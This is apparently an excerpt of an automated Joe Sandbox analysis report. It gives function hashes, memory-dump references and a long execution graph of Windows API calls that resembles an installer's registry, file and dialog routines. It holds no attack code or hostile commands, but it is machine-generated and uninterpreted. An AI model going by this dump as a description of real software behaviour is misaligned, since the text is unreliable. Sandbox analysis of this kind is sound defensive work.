                                                        • Instruction ID: 2cae6a16bd3480448f96462522efe011457f10bae30ab4d30ba88edf7855fa52
                                                        • Opcode Fuzzy Hash: c893aa0bcc44eb6e6ea97f4031d42d54ef2b984fee98845ff48b5471311b7bca
                                                        • Instruction Fuzzy Hash: EEF06D13818F8886D2029F18A8001ABB334FF5E798F555326EF8C2A515DF68E582C714
                                                        Function 00007FF70203A7C0 Relevance: 5.1, APIs: 4, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 0c7d6611abb24f1b3f626703346471fab02f7d3a4585e3851d1ae14fc863699a
                                                        • Instruction ID: a050a3e2f7fb888cb1edd41e1f273282c02bc3fe63587db231c8daefdd696844
                                                        • Opcode Fuzzy Hash: 0c7d6611abb24f1b3f626703346471fab02f7d3a4585e3851d1ae14fc863699a
                                                        • Instruction Fuzzy Hash: E531B563F0C7028AEB55AF34DC002A8A7A8EF45B58F888331DD5D566D4EF78D982C750
                                                        Function 00007FF70203A910 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 4789de5d9e4f9d309eabd2db46f33086866cebd15088551209128cd9b810c7fe
                                                        • Instruction ID: 34c5ee87544543907f799b0692a0ae51fc2968594f1b8f807fad36f6d7978a3f
                                                        • Opcode Fuzzy Hash: 4789de5d9e4f9d309eabd2db46f33086866cebd15088551209128cd9b810c7fe
                                                        • Instruction Fuzzy Hash: 99214173B0C75286EB509F25AA00279A7A4EF44BA8F884232DD69973C4DFB8D845C764

                                                        Execution Graph

                                                        Execution Coverage:17.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16.4%
                                                        Total number of Nodes:1482
                                                        Total number of Limit Nodes:26
                                                        execution_graph 4196 402fc0 4197 401446 18 API calls 4196->4197 4198 402fc7 4197->4198 4199 401a13 4198->4199 4200 403017 4198->4200 4201 40300a 4198->4201 4203 406831 18 API calls 4200->4203 4202 401446 18 API calls 4201->4202 4202->4199 4203->4199 4204 4023c1 4205 40145c 18 API calls 4204->4205 4206 4023c8 4205->4206 4209 407296 4206->4209 4212 406efe CreateFileW 4209->4212 4213 406f30 4212->4213 4214 406f4a ReadFile 4212->4214 4215 4062cf 11 API calls 4213->4215 4216 4023d6 4214->4216 4219 406fb0 4214->4219 4215->4216 4217 406fc7 ReadFile lstrcpynA lstrcmpA 4217->4219 4220 40700e SetFilePointer ReadFile 4217->4220 4218 40720f CloseHandle 4218->4216 4219->4216 4219->4217 4219->4218 4221 407009 4219->4221 4220->4218 4222 4070d4 ReadFile 4220->4222 4221->4218 4223 407164 4222->4223 4223->4221 4223->4222 4224 40718b SetFilePointer GlobalAlloc ReadFile 4223->4224 4225 4071eb lstrcpynW GlobalFree 4224->4225 4226 4071cf 4224->4226 4225->4218 4226->4225 4226->4226 4227 401cc3 4228 40145c 18 API calls 4227->4228 4229 401cca lstrlenW 4228->4229 4230 4030dc 4229->4230 4231 4030e3 4230->4231 4233 405f7d wsprintfW 4230->4233 4233->4231 4234 401c46 4235 40145c 18 API calls 4234->4235 4236 401c4c 4235->4236 4237 4062cf 11 API calls 4236->4237 4238 401c59 4237->4238 4239 406cc7 81 API calls 4238->4239 4240 401c64 4239->4240 4241 403049 4242 401446 18 API calls 4241->4242 4243 403050 4242->4243 4244 406831 18 API calls 4243->4244 4245 401a13 4243->4245 4244->4245 4246 40204a 4247 401446 18 API calls 4246->4247 4248 402051 IsWindow 4247->4248 4249 4018d3 4248->4249 4250 40324c 4251 403277 4250->4251 4252 40325e SetTimer 4250->4252 4253 4032cc 4251->4253 4254 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4251->4254 4252->4251 4254->4253 4255 4022cc 4256 40145c 18 API calls 4255->4256 4257 4022d3 4256->4257 4258 406301 2 API calls 4257->4258 4259 4022d9 4258->4259 4261 4022e8 4259->4261 4264 405f7d wsprintfW 4259->4264 4262 4030e3 4261->4262 4265 405f7d wsprintfW 4261->4265 4264->4261 4265->4262 4266 4030cf 4267 40145c 18 API calls 4266->4267 4268 4030d6 4267->4268 4270 4030dc 4268->4270 4273 4063d8 GlobalAlloc lstrlenW 4268->4273 4271 4030e3 4270->4271 4300 405f7d wsprintfW 4270->4300 4274 406460 4273->4274 4275 40640e 4273->4275 4274->4270 4276 40643b GetVersionExW 4275->4276 4301 406057 CharUpperW 4275->4301 4276->4274 4277 40646a 4276->4277 4278 406490 LoadLibraryA 4277->4278 4279 406479 4277->4279 4278->4274 4282 4064ae GetProcAddress GetProcAddress GetProcAddress 4278->4282 4279->4274 4281 4065b1 GlobalFree 4279->4281 4283 4065c7 LoadLibraryA 4281->4283 4284 406709 FreeLibrary 4281->4284 4285 406621 4282->4285 4289 4064d6 4282->4289 4283->4274 4287 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4274 4286 40667d FreeLibrary 4285->4286 4288 406656 4285->4288 4286->4288 4287->4285 4292 406716 4288->4292 4297 4066b1 lstrcmpW 4288->4297 4298 4066e2 CloseHandle 4288->4298 4299 406700 CloseHandle 4288->4299 4289->4285 4290 406516 4289->4290 4291 4064fa FreeLibrary GlobalFree 4289->4291 4290->4281 4293 406528 lstrcpyW OpenProcess 4290->4293 4295 40657b CloseHandle CharUpperW lstrcmpW 4290->4295 4291->4274 4294 40671b CloseHandle FreeLibrary 4292->4294 4293->4290 4293->4295 4296 406730 CloseHandle 4294->4296 4295->4285 4295->4290 4296->4294 4297->4288 4297->4296 4298->4288 4299->4284 4300->4271 4301->4275 4302 4044d1 4303 40450b 4302->4303 4304 40453e 4302->4304 4370 405cb0 GetDlgItemTextW 4303->4370 4305 40454b GetDlgItem GetAsyncKeyState 4304->4305 4309 4045dd 4304->4309 4307 40456a GetDlgItem 4305->4307 4320 404588 4305->4320 4312 403d6b 19 API calls 4307->4312 4308 4046c9 4368 40485f 4308->4368 4372 405cb0 GetDlgItemTextW 4308->4372 4309->4308 4317 406831 18 API calls 4309->4317 4309->4368 4310 404516 4311 406064 5 API calls 4310->4311 4313 40451c 4311->4313 4315 40457d ShowWindow 4312->4315 4316 403ea0 5 API calls 4313->4316 4315->4320 4321 404521 GetDlgItem 4316->4321 4322 40465b SHBrowseForFolderW 4317->4322 4318 4046f5 4323 4067aa 18 API calls 4318->4323 4319 403df6 8 API calls 4324 404873 4319->4324 4325 4045a5 SetWindowTextW 4320->4325 4329 405d85 4 API calls 4320->4329 4326 40452f IsDlgButtonChecked 4321->4326 4321->4368 4322->4308 4328 404673 CoTaskMemFree 4322->4328 4333 4046fb 4323->4333 4327 403d6b 19 API calls 4325->4327 4326->4304 4331 4045c3 4327->4331 4332 40674e 3 API calls 4328->4332 4330 40459b 4329->4330 4330->4325 4337 40674e 3 API calls 4330->4337 4334 403d6b 19 API calls 4331->4334 4335 404680 4332->4335 4373 406035 lstrcpynW 4333->4373 4338 4045ce 4334->4338 4339 4046b7 SetDlgItemTextW 4335->4339 4344 406831 18 API calls 4335->4344 4337->4325 4371 403dc4 SendMessageW 4338->4371 4339->4308 4340 404712 4342 406328 3 API calls 4340->4342 4351 40471a 4342->4351 4343 4045d6 4345 406328 3 API calls 4343->4345 4346 40469f lstrcmpiW 4344->4346 4345->4309 4346->4339 4349 4046b0 lstrcatW 4346->4349 4347 40475c 4374 406035 lstrcpynW 4347->4374 4349->4339 4350 404765 4352 405d85 4 API calls 4350->4352 4351->4347 4355 40677d 2 API calls 4351->4355 4357 4047b1 4351->4357 4353 40476b GetDiskFreeSpaceW 4352->4353 4356 40478f MulDiv 4353->4356 4353->4357 4355->4351 4356->4357 4358 40480e 4357->4358 4375 4043d9 4357->4375 4359 404831 4358->4359 4361 40141d 80 API calls 4358->4361 4383 403db1 KiUserCallbackDispatcher 4359->4383 4361->4359 4362 4047ff 4364 404810 SetDlgItemTextW 4362->4364 4365 404804 4362->4365 4364->4358 4367 4043d9 21 API calls 4365->4367 4366 40484d 4366->4368 4384 403d8d 4366->4384 4367->4358 4368->4319 4370->4310 4371->4343 4372->4318 4373->4340 4374->4350 4376 4043f9 4375->4376 4377 406831 18 API calls 4376->4377 4378 404439 4377->4378 4379 406831 18 API calls 4378->4379 4380 404444 4379->4380 4381 406831 18 API calls 4380->4381 4382 404454 lstrlenW wsprintfW SetDlgItemTextW 4381->4382 4382->4362 4383->4366 4385 403da0 SendMessageW 4384->4385 4386 403d9b 4384->4386 4385->4368 4386->4385 4387 401dd3 4388 401446 18 API calls 4387->4388 4389 401dda 4388->4389 4390 401446 18 API calls 4389->4390 4391 4018d3 4390->4391 4392 402e55 4393 40145c 18 API calls 4392->4393 4394 402e63 4393->4394 4395 402e79 4394->4395 4396 40145c 18 API calls 4394->4396 4397 405e5c 2 API calls 4395->4397 4396->4395 4398 402e7f 4397->4398 4422 405e7c GetFileAttributesW CreateFileW 4398->4422 4400 402e8c 4401 402f35 4400->4401 4402 402e98 GlobalAlloc 4400->4402 4405 4062cf 11 API calls 4401->4405 4403 402eb1 4402->4403 4404 402f2c CloseHandle 4402->4404 4423 403368 SetFilePointer 4403->4423 4404->4401 4407 402f45 4405->4407 4409 402f50 DeleteFileW 4407->4409 4410 402f63 4407->4410 4408 402eb7 4411 403336 ReadFile 4408->4411 4409->4410 4424 401435 4410->4424 4413 402ec0 GlobalAlloc 4411->4413 4414 402ed0 4413->4414 4415 402f04 WriteFile GlobalFree 4413->4415 4417 40337f 33 API calls 4414->4417 4416 40337f 33 API calls 4415->4416 4418 402f29 4416->4418 4421 402edd 4417->4421 4418->4404 4420 402efb GlobalFree 4420->4415 4421->4420 4422->4400 4423->4408 4425 404f9e 25 API calls 4424->4425 4426 401443 4425->4426 4427 401cd5 4428 401446 18 API calls 4427->4428 4429 401cdd 4428->4429 4430 401446 18 API calls 4429->4430 4431 401ce8 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401cf1 4432->4433 4434 401d07 lstrlenW 4433->4434 4435 401d43 4433->4435 4436 401d11 4434->4436 4436->4435 4440 406035 lstrcpynW 4436->4440 4438 401d2c 4438->4435 4439 401d39 lstrlenW 4438->4439 4439->4435 4440->4438 4441 402cd7 4442 401446 18 API calls 4441->4442 4444 402c64 4442->4444 4443 402d17 ReadFile 4443->4444 4444->4441 4444->4443 4445 402d99 4444->4445 4446 402dd8 4447 4030e3 4446->4447 4448 402ddf 4446->4448 4449 402de5 FindClose 4448->4449 4449->4447 4450 401d5c 4451 40145c 18 API calls 4450->4451 4452 401d63 4451->4452 4453 40145c 18 API calls 4452->4453 4454 401d6c 4453->4454 4455 401d73 lstrcmpiW 4454->4455 4456 401d86 lstrcmpW 4454->4456 4457 401d79 4455->4457 4456->4457 4458 401c99 4456->4458 4457->4456 4457->4458 4459 4027e3 4460 4027e9 4459->4460 4461 4027f2 4460->4461 4462 402836 4460->4462 4475 401553 4461->4475 4463 40145c 18 API calls 4462->4463 4465 40283d 4463->4465 4467 4062cf 11 API calls 4465->4467 4466 4027f9 4468 40145c 18 API calls 4466->4468 4472 401a13 4466->4472 4469 40284d 4467->4469 4470 40280a RegDeleteValueW 4468->4470 4479 40149d RegOpenKeyExW 4469->4479 4471 4062cf 11 API calls 4470->4471 4474 40282a RegCloseKey 4471->4474 4474->4472 4476 401563 4475->4476 4477 40145c 18 API calls 4476->4477 4478 401589 RegOpenKeyExW 4477->4478 4478->4466 4482 4014c9 4479->4482 4487 401515 4479->4487 4480 4014ef RegEnumKeyW 4481 401501 RegCloseKey 4480->4481 4480->4482 4484 406328 3 API calls 4481->4484 4482->4480 4482->4481 4483 401526 RegCloseKey 4482->4483 4485 40149d 3 API calls 4482->4485 4483->4487 4486 401511 4484->4486 4485->4482 4486->4487 4488 401541 RegDeleteKeyW 4486->4488 4487->4472 4488->4487 4489 4040e4 4490 4040ff 4489->4490 4496 40422d 4489->4496 4492 40413a 4490->4492 4520 403ff6 WideCharToMultiByte 4490->4520 4491 404298 4493 40436a 4491->4493 4494 4042a2 GetDlgItem 4491->4494 4500 403d6b 19 API calls 4492->4500 4501 403df6 8 API calls 4493->4501 4497 40432b 4494->4497 4498 4042bc 4494->4498 4496->4491 4496->4493 4499 404267 GetDlgItem SendMessageW 4496->4499 4497->4493 4502 40433d 4497->4502 4498->4497 4506 4042e2 6 API calls 4498->4506 4525 403db1 KiUserCallbackDispatcher 4499->4525 4504 40417a 4500->4504 4505 404365 4501->4505 4507 404353 4502->4507 4508 404343 SendMessageW 4502->4508 4510 403d6b 19 API calls 4504->4510 4506->4497 4507->4505 4511 404359 SendMessageW 4507->4511 4508->4507 4509 404293 4512 403d8d SendMessageW 4509->4512 4513 404187 CheckDlgButton 4510->4513 4511->4505 4512->4491 4523 403db1 KiUserCallbackDispatcher 4513->4523 4515 4041a5 GetDlgItem 4524 403dc4 SendMessageW 4515->4524 4517 4041bb SendMessageW 4518 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4517->4518 4519 4041d8 GetSysColor 4517->4519 4518->4505 4519->4518 4521 404033 4520->4521 4522 404015 GlobalAlloc WideCharToMultiByte 4520->4522 4521->4492 4522->4521 4523->4515 4524->4517 4525->4509 4526 402ae4 4527 402aeb 4526->4527 4528 4030e3 4526->4528 4529 402af2 CloseHandle 4527->4529 4529->4528 4530 402065 4531 401446 18 API calls 4530->4531 4532 40206d 4531->4532 4533 401446 18 API calls 4532->4533 4534 402076 GetDlgItem 4533->4534 4535 4030dc 4534->4535 4536 4030e3 4535->4536 4538 405f7d wsprintfW 4535->4538 4538->4536 4539 402665 4540 40145c 18 API calls 4539->4540 4541 40266b 4540->4541 4542 40145c 18 API calls 4541->4542 4543 402674 4542->4543 4544 40145c 18 API calls 4543->4544 4545 40267d 4544->4545 4546 4062cf 11 API calls 4545->4546 4547 40268c 4546->4547 4548 406301 2 API calls 4547->4548 4549 402695 4548->4549 4550 4026a6 lstrlenW lstrlenW 4549->4550 4552 404f9e 25 API calls 4549->4552 4554 4030e3 4549->4554 4551 404f9e 25 API calls 4550->4551 4553 4026e8 SHFileOperationW 4551->4553 4552->4549 4553->4549 4553->4554 4555 401c69 4556 40145c 18 API calls 4555->4556 4557 401c70 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 401c80 4558->4559 4560 405ccc MessageBoxIndirectW 4559->4560 4561 401a13 4560->4561 4562 402f6e 4563 402f72 4562->4563 4564 402fae 4562->4564 4566 4062cf 11 API calls 4563->4566 4565 40145c 18 API calls 4564->4565 4572 402f9d 4565->4572 4567 402f7d 4566->4567 4568 4062cf 11 API calls 4567->4568 4569 402f90 4568->4569 4570 402fa2 4569->4570 4571 402f98 4569->4571 4574 406113 9 API calls 4570->4574 4573 403ea0 5 API calls 4571->4573 4573->4572 4574->4572 4575 4023f0 4576 402403 4575->4576 4577 4024da 4575->4577 4578 40145c 18 API calls 4576->4578 4579 404f9e 25 API calls 4577->4579 4580 40240a 4578->4580 4583 4024f1 4579->4583 4581 40145c 18 API calls 4580->4581 4582 402413 4581->4582 4584 402429 LoadLibraryExW 4582->4584 4585 40241b GetModuleHandleW 4582->4585 4586 4024ce 4584->4586 4587 40243e 4584->4587 4585->4584 4585->4587 4589 404f9e 25 API calls 4586->4589 4599 406391 GlobalAlloc WideCharToMultiByte 4587->4599 4589->4577 4590 402449 4591 40248c 4590->4591 4592 40244f 4590->4592 4593 404f9e 25 API calls 4591->4593 4594 401435 25 API calls 4592->4594 4597 40245f 4592->4597 4595 402496 4593->4595 4594->4597 4596 4062cf 11 API calls 4595->4596 4596->4597 4597->4583 4598 4024c0 FreeLibrary 4597->4598 4598->4583 4600 4063c9 GlobalFree 4599->4600 4601 4063bc GetProcAddress 4599->4601 4600->4590 4601->4600 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4602 4048f8 4603 404906 4602->4603 4604 40491d 4602->4604 4605 40490c 4603->4605 4620 404986 4603->4620 4606 40492b IsWindowVisible 4604->4606 4612 404942 4604->4612 4607 403ddb SendMessageW 4605->4607 4609 404938 4606->4609 4606->4620 4610 404916 4607->4610 4608 40498c CallWindowProcW 4608->4610 4621 40487a SendMessageW 4609->4621 4612->4608 4626 406035 lstrcpynW 4612->4626 4614 404971 4627 405f7d wsprintfW 4614->4627 4616 404978 4617 40141d 80 API calls 4616->4617 4618 40497f 4617->4618 4628 406035 lstrcpynW 4618->4628 4620->4608 4622 4048d7 SendMessageW 4621->4622 4623 40489d GetMessagePos ScreenToClient SendMessageW 4621->4623 4625 4048cf 4622->4625 4624 4048d4 4623->4624 4623->4625 4624->4622 4625->4612 4626->4614 4627->4616 4628->4620 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4629 4020f9 GetDC GetDeviceCaps 4630 401446 18 API calls 4629->4630 4631 402116 MulDiv 4630->4631 4632 401446 18 API calls 4631->4632 4633 40212c 4632->4633 4634 406831 18 API calls 4633->4634 4635 402165 CreateFontIndirectW 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f7d wsprintfW 4636->4639 4639->4637 4640 4024fb 4641 40145c 18 API calls 4640->4641 4642 402502 4641->4642 4643 40145c 18 API calls 4642->4643 4644 40250c 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402515 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40251f 4647->4648 4649 40145c 18 API calls 4648->4649 4650 402529 4649->4650 4651 40253d 4650->4651 4652 40145c 18 API calls 4650->4652 4653 4062cf 11 API calls 4651->4653 4652->4651 4654 40256a CoCreateInstance 4653->4654 4655 40258c 4654->4655 4656 4026fc 4658 402708 4656->4658 4659 401ee4 4656->4659 4657 406831 18 API calls 4657->4659 4659->4656 4659->4657 4660 4019fd 4661 40145c 18 API calls 4660->4661 4662 401a04 4661->4662 4663 405eab 2 API calls 4662->4663 4664 401a0b 4663->4664 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 